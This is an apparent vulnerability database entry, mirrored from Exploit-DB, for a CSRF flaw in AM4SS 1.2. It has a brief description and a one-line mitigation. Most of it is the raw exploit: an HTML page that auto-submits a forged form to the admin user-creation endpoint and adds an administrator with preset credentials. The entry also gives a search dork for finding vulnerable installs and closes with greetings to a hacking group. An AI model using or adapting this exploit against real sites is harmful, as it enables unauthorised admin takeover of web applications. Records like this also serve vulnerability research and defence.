AM4SS Version 1.2 - CSRF add Admin

vendor:

AM4SS

by:

red virus

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: AM4SS

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: am4ss:am4ss:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

AM4SS Version 1.2 – CSRF add Admin

This exploit allows an attacker to add an admin user to the AM4SS Version 1.2 application by sending a malicious request to the users.php page. The malicious request contains the user details such as username, password, email, country, and usergroup. The attacker can then use the credentials to gain access to the application.

Mitigation:

Implementing a CSRF token in the application can help prevent this type of attack.

Source

Exploit-DB raw data:

#Title    :  AM4SS Version 1.2  - CSRF add Admin
#Script   :  AM4SS Version 1.2
#Language : Php
#Download : http://am4ss.org/am4ss.tar.gz                 
#Date     : 2011/09/09
#Version  : 1.2
#Dork     : "Powered by AM4SS "
#Found    : by red virus >>> c3o@w.cn
#Homepage : www.alm3refh.com
 
 
 
<html>
<form  name="r3dvirus" action="http://localhost/am4ss/admincp/users.php?do=add" method="post">
<input value="egypt"  name="userfullname" type="text" /> 									
<input value="123456"   name="password" type="text" /> 									
<input value="c3o@w.cn"  name="useremail" type="text" />							
<input value="EG"  name="country" type="text" />
<input value="3"  name="usergroup" type="text" />
<input value="save"  name="do" type="text" />																
</form>
<script>document.r3dvirus.submit();</script>
</html>

###########################################################################################################
greats 2
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 & orange man
infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group